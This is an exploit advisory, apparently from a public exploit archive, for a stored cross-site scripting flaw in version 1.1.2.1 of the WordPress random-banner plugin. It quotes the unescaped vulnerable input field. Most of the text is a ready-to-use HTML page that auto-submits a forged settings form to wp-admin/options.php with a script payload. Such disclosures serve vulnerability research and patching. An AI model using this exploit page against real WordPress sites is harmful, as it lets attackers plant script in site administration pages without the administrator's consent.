###################### # Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/random-banner/ # Software Link : http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip # Date : 2014-06-28 # Tested on : Windows 7 / Mozilla Firefox ###################### # Vulnerable code : <input placeholder="Link for that image" type="text" size="25" name="buffercode_RBanner_url_banner1" value="<?php echo get_option('buffercode_RBanner_url_banner1') ?>" /> ###################### Exploit Code: <html> <body> <form name="post_form" method="post" action="http://localhost/wp-admin/options.php"> <input type='hidden' name='option_page' value='buffercode_RBanner_settings_group' /> <input type="hidden" name="action" value="update" /> <input type="hidden" id="_wpnonce" name="_wpnonce" value="1d67ba2e9e" /> <input type="hidden" name="_wp_http_referer" value="/wp-admin/options-general.php?page=random-banner%2Frandom-banner.php&settings-updated=true" /> <input placeholder="Link for that image" type='hidden' size="25" name="buffercode_RBanner_url_banner1" value='"/><script>alert(1);</script>'/> <script language="Javascript"> setTimeout('post_form.submit()', 1); </script> </form> </body> </html> ##################### Discovered By : ACC3SS ##################### |
(595)